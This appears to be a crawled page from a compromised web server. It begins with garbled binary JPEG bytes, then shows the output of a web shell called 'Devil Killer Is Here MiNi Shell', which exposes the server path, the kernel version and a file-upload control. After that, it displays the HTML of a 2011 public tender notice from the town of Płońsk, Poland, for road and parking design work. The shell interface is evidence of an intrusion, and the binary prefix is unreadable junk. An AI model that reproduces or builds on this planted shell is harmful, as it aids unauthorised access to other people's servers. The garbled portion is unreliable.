JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/99574-N-2011.html

<p class="kh_header"><b>Płońsk: Opracowanie dokumentacji projektowych:Część I: Opracowanie dokumentacji projektowej przebudowy ul. Mazowieckiej w Płońsku.Część II:Opracowanie dokumentacji projektowych:1) Budowa parkingów na terenach parku przy ulicy Wolności po stronie północnej ulicy, na skarpie-od ul. Grunwaldzkiej w kierunku zachodnim,2)Budowy parkingów na terenach parku przy ul. Wolności przylegającym od strony pn.-zach.do zespołu garaży przy osiedlu Wspólnoty Mieszkaniowej, 3)Ciągu pieszo jezdnego od ul. Grunwaldzkiej w kierunku pn.-wsch. przylegającego do budynku Grunwaldzka 28 i wyznaczenie pasa do parkowania pojazdów</b><br>
<b>Numer ogłoszenia: 99574 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Płońsk reprezentowana przez Burmistrza Miasta Płońsk , ul. Płocka 39, 09-100 Płońsk, woj. mazowieckie, tel. 023 6622691, faks 023 663 13 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plonsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowych:Część I: Opracowanie dokumentacji projektowej przebudowy ul. Mazowieckiej w Płońsku.Część II:Opracowanie dokumentacji projektowych:1) Budowa parkingów na terenach parku przy ulicy Wolności po stronie północnej ulicy, na skarpie-od ul. Grunwaldzkiej w kierunku zachodnim,2)Budowy parkingów na terenach parku przy ul. Wolności przylegającym od strony pn.-zach.do zespołu garaży przy osiedlu Wspólnoty Mieszkaniowej, 3)Ciągu pieszo jezdnego od ul. Grunwaldzkiej w kierunku pn.-wsch. przylegającego do budynku Grunwaldzka 28 i wyznaczenie pasa do parkowania pojazdów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia części I jest: Opracowanie dokumentacji projektowej przebudowy ul. Mazowieckiej w Płońsku.
Wykonawca zobowiązany jest wykonać dokumentację zgodnie z obowiązującymi przepisami prawa,  w szczególności:
-Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego  (Dz. U. z 2004 r. Nr 202, poz. 2072),
-Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 r., Nr 120, poz.1133). 
Ponadto należy uwzględnić wymagania wszystkich związanych przepisów, norm i zarządzeń, m.in.:
-Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999 r. Nr 43, poz. 430),
-Rozporządzenie Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. z 2010 r. Nr 213, poz. 1397),
-Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729),
-Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U.  z 2004 r. Nr 130, poz. 1389),
-Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126),
-Ustawa z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908 t.j.),
-Ustawa z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2007 r. Nr 19, poz. 115 t.j.),
-Ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 t.j.),
-Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 t.j.).
Zakres przedmiotu zamówienia
1.	Opracowanie kompletnej dokumentacji projektowej na całość zadania oraz  opracowań towarzyszących, w tym:
1)	wykonanie mapy do celów projektowych,
2)	uzyskanie w imieniu Zamawiającego decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia drogowego, w tym w szczególności złożenie wniosku wraz z kompletem wymaganych przepisami prawa załączników,
3)	opracowanie  dokumentacji niezbędnej do realizacji przedmiotu zamówienia, wynikającej z przepisów w zakresie udostępnienia informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, a także  z dyrektyw UE w tym w zakresie (jeżeli będzie wymagana), 
4)	opracowanie dokumentów formalno-prawnych pozwalających na uregulowanie własności gruntu przygotowane w uzgodnieniu i za akceptacją Zamawiającego (jeżeli będą wymagane),
5)	badania geotechniczne gruntu (jeżeli będą wymagane), 
6)	pozwolenie wodno prawne (jeżeli będzie wymagane),
7)	inwentaryzację zieleni, projekt gospodarki istniejącą szatą roślinną, 
8)	projekt budowlany i wykonawczy drogi,  
9)	projekt budowy  lub przebudowy odwodnienia (kanalizacji deszczowej), 
10)	projekt budowy oświetlenia drogowego, 
11)	przedmiary robót,  oddzielnie dla każdej branży,
12)	kosztorys inwestorski,
13)	szczegółowe specyfikacje techniczne wykonania i odbioru robót,
14)	informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ),
15)	uzyskanie opinii  Zespołu  Koordynacji usytuowania projektowanych sieci uzbrojenia terenu Starostwa Powiatowego w Płońsku,
16)	uzyskanie wymaganych opinii i innych uzgodnień właściwych organów  niezbędnych do uzyskania decyzji administracyjnych,
17)	projekt organizacji ruchu, 
18)	uzyskanie w imieniu Zamawiającego niezbędnych warunków technicznych dla projektowanej w pasie drogowym infrastruktury technicznej, 
19)	złożenie w imieniu Zamawiającego wniosku do Starostwa Powiatowego w Płońsku o wydanie decyzji  pozwolenia na budowę,
20)	opracowanie studium wykonalności dla inwestycji finansowanej przez Unię Europejską, (wraz              z analizą kosztów i korzyści związanych z planowaną inwestycją, oceną możliwości uzyskania dofinansowania z UE),
21)	mapy zawierające projekty podziału nieruchomości (jeżeli będą wymagane).

Dokumentacja projektowa będzie podstawą ubiegania się o środki UE na realizację inwestycji.

Zamawiający zastrzega sobie prawo do weryfikacji projektu przez niezależną jednostkę.

2.	Pełnienie nadzoru autorskiego we wszystkich branżach objętych projektowaniem, w tym udział                   w radach budowy, uzgadnianie indywidualnej dokumentacji technicznej i rysunków warsztatowych opracowywanych przez wykonawcę robót budowlanych, kwalifikowanie odstąpień od zatwierdzonego projektu budowlanego.
Parametry techniczne do uwzględnienia w dokumentacji projektowej:
Droga gminna na odcinku od ul. Płockiej do drogi nr 10 o długości - ok. 865 m. 
Klasa drogi - Lp ? w kierunku Zo ?.
Funkcje w układzie miejskim - obsługa dzielnicy przemysłowej w kierunku: powiązania wewnątrzmiejskie.
Przekrój jezdni - 1x7,0 m
Szerokość w liniach rozgraniczających - 25,0 m
Przebieg po śladzie istniejącej ulicy. 

W projekcie należy uwzględnić:
-ścieżki rowerowe,
- pasy terenu pod budowę infrastruktury technicznej,
- powiązanie projektu z Projektowaną Obwodnicą Zachodnią  im. Jana Pawła II w Płońsku (projekt w trakcie opracowania, koncepcja w załączeniu - załącznik nr 9 do siwz,
- poprawę bezpieczeństwa ruchu na skrzyżowaniach, 
- poprawę płynności i sprawności ruchu  na skrzyżowaniach,
- miejsca parkingowe, 
- poprawę jakości nawierzchni ulicy i chodników,
- odwodnienie ulicy, 
- aktualizację organizacji ruchu drogowego. 

Wykonawca jest zobowiązany uzyskać akceptację Zamawiającego w zakresie szczegółowych rozwiązań technicznych na etapie projektowania.

Zamawiający dostarczy Wykonawcy w dniu podpisania umowy wypisy i wyrysy z Miejscowego  Planu  Zagospodarowania Przestrzennego miasta Płońska. 
Dokumentację projektową należy sporządzić w formie papierowej w 8 egzemplarzach,  kosztorys inwestorski w 2 egz. 
Pełen zakres dokumentacji projektowo-kosztorysowej (oprócz kosztorysu inwestorskiego) należy również sporządzić w wersji elektronicznej na nośniku CD/DVD ( opracowania w wersji elektronicznej mają służyć Zamawiającemu do zamieszczenia dokumentacji na stronie internetowej) - w formacie pdf. 

3.2. Przedmiotem zamówienia części II jest: Opracowanie dokumentacji projektowych (oddzielnej dla każdego obiektu):
1)	Budowa parkingów na terenach parku przy ulicy Wolności po stronie północnej ulicy, na skarpie - od ul. Grunwaldzkiej w kierunku zachodnim,
2)	Budowy parkingów na terenach parku przy ul. Wolności przylegającym od strony pn.-zach. do zespołu garaży przy osiedlu Wspólnoty Mieszkaniowej,
3)	Ciągu pieszo jezdnego od ul. Grunwaldzkiej w kierunku pn.-wsch. przylegającego do budynku Grunwaldzka 28 i wyznaczenie pasa do parkowania pojazdów.

Wykonawca zobowiązany jest wykonać dokumentację zgodnie z obowiązującymi przepisami prawa,  w szczególności:
-Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego  (Dz. U. z 2004 r. Nr 202, poz. 2072),
-Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu               i formy projektu budowlanego (Dz. U. z 2003 r., Nr 120, poz.1133). 
Ponadto należy uwzględnić wymagania wszystkich związanych przepisów, norm i zarządzeń, m.in.:
-Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999 r. Nr 43, poz. 430),
-Rozporządzenie Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. z 2010 r. Nr 213, poz. 1397),
-Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729),
-Rozporządzenie Ministra Infrastruktury z 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U.  z 2004 r. Nr 130, poz. 1389),
-Rozporządzenie Ministra Infrastruktury z 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126),
-Ustawa z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908 t.j.),
-Ustawa z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2007 r. Nr 19, poz. 115 t.j.),
-Ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 t.j.),
-Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 t.j.).


Zakres przedmiotu zamówienia
1. Opracowanie kompletnej dokumentacji projektowej na całość zamówienia oraz  opracowań towarzyszących, (oddzielnie dla każdego obiektu) w tym:

1)	wykonanie mapy do celów projektowych,
2)	uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach zgody na realizację przedmiotu umowy, w tym w szczególności złożenie wniosku wraz                        z kompletem wymaganych przepisami prawa załączników,
3)	opracowanie  dokumentacji niezbędnej do realizacji przedmiotu zamówienia, wynikającej                z przepisów w zakresie udostępnienia informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (jeżeli będzie wymagana), 
4)	opracowanie dokumentów formalno-prawnych pozwalających na uregulowanie własności gruntu przygotowane w uzgodnieniu i za akceptacją Zamawiającego (jeżeli będą wymagane),
5)	badania geotechniczne gruntu (jeżeli będą wymagane), 
6)	pozwolenie wodno prawne (jeżeli będzie wymagane),
7)	inwentaryzację zieleni, projekt gospodarki istniejącą szatą roślinną, 
8)	projekt budowlany wykonawczy,  
9)	projekt budowy  lub przebudowy odwodnienia (kanalizacji deszczowej), 
10)	projekt budowy oświetlenia drogowego, 
11)	przedmiary robót,  oddzielnie dla każdej branży w ramach obiektu,
12)	kosztorys inwestorski,
13)	szczegółowe specyfikacje techniczne wykonania i odbioru robót,
14)	informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ),
15)	uzyskanie opinii  Zespołu  Koordynacji usytuowania projektowanych sieci uzbrojenia terenu Starostwa Powiatowego w Płońsku,
16)	uzyskanie wymaganych opinii i innych uzgodnień właściwych organów  niezbędnych do uzyskania decyzji administracyjnych,
17)	projekt organizacji ruchu (jeżeli będzie wymagany),
18)	uzyskanie w imieniu Zamawiającego niezbędnych warunków technicznych dla projektowanej w pasie drogowym infrastruktury technicznej, 
19)	złożenie w imieniu Zamawiającego wniosku do Starostwa Powiatowego w Płońsku 
      o wydanie decyzji  pozwolenia na budowę,
20)	mapy zawierające projekty podziału nieruchomości (jeżeli będą wymagane).
2.	Pełnienie nadzoru autorskiego we wszystkich branżach objętych projektowaniem, w tym udział     w radach budowy, uzgadnianie indywidualnej dokumentacji technicznej i rysunków warsztatowych opracowywanych przez wykonawcę robót budowlanych, kwalifikowanie odstąpień od zatwierdzonego projektu budowlanego.

Parametry techniczne do uwzględnienia w dokumentacji projektowej:
1)	Obiekt - Budowa parkingów na terenach parku przy ulicy Wolności po stronie północnej ulicy, na skarpie - od ul. Grunwaldzkiej w kierunku zachodnim,
Parking zielony:
Powierzchnia parkingu ok. 782 m2
Miejsc parkingowych ok. 34
Nawierzchnia: kostka betonowa, płyty ażurowe lub inne rozwiązania zaproponowane przez Wykonawcę. 
(mapa z proponowanym terenem lokalizacji parkingu w załączeniu - załącznik nr 10 do siwz).

2)	Obiekt - Budowy parkingów na terenach parku przy ul. Wolności przylegającym od strony pn. - zach. do zespołu garaży przy osiedlu Wspólnoty Mieszkaniowej,
Powierzchnia parkingu ok. 276 m2
Miejsc parkingowych ok. 12
Nawierzchnia: kostka betonowa lub inne rozwiązania zaproponowane przez Wykonawcę.
W projekcie należy uwzględnić powiązanie projektu z Projektowaną Obwodnicą Wewnętrzną Centrum miasta Płońska (załącznik nr 9 do siwz).

3)	Obiekt - Ciągu pieszo jezdnego od ul. Grunwaldzkiej w kierunku pn.- wsch. przylegającego do budynku Grunwaldzka 28 i wyznaczenie pasa do parkowania pojazdów.
Długość ok. 90 m
Nawierzchnia: kostka betonowa lub inne rozwiązania zaproponowane przez Wykonawcę.

Zamawiający zastrzega sobie prawo do weryfikacji projektu przez niezależną jednostkę.

Wykonawca jest zobowiązany uzyskać akceptację Zamawiającego w zakresie szczegółowych rozwiązań technicznych na etapie projektowania (dotyczy wszystkich obiektów).

Zamawiający dostarczy Wykonawcy w dniu podpisania umowy wypisy i wyrysy z Miejscowego  Planu  Zagospodarowania Przestrzennego miasta Płońska. 
Dokumentację projektową należy sporządzić w formie papierowej w 8 egzemplarzach,  kosztorys inwestorski w 2 egz. (dla każdego obiektu oddzielnie)
Pełny zakres dokumentacji projektowo-kosztorysowej (oprócz kosztorysu inwestorskiego) należy również sporządzić w wersji elektronicznej na nośniku CD/DVD ( opracowania w wersji elektronicznej mają służyć Zamawiającemu do zamieszczenia dokumentacji na stronie internetowej) - w formacie pdf..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda załączenia do oferty dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda załączenia do oferty dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda załączenia do oferty dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda  załączenia do oferty następujących dokumentów:
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami.  
Na potwierdzenie spełnienia warunku Wykonawca zobowiązany jest wykazać, że dysponuje osobą/osobami zdolnymi do wykonania zamówienia (według załącznika nr 5), posiadającą/cymi uprawnienia do projektowania w następujących specjalnościach:
- drogowej
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,  wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.
Wykonawca zobowiązany jest złożyć oświadczenie potwierdzające, że osoba/osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia zgodnie 
z obowiązującymi przepisami (według załącznika nr 6 do siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda załączenia do oferty dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Do części I i II: 
Zmiana umowy na podstawie art. 144 ust.1 powołanej ustawy  w sprawie zamówienia publicznego                    w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy może być spowodowana:
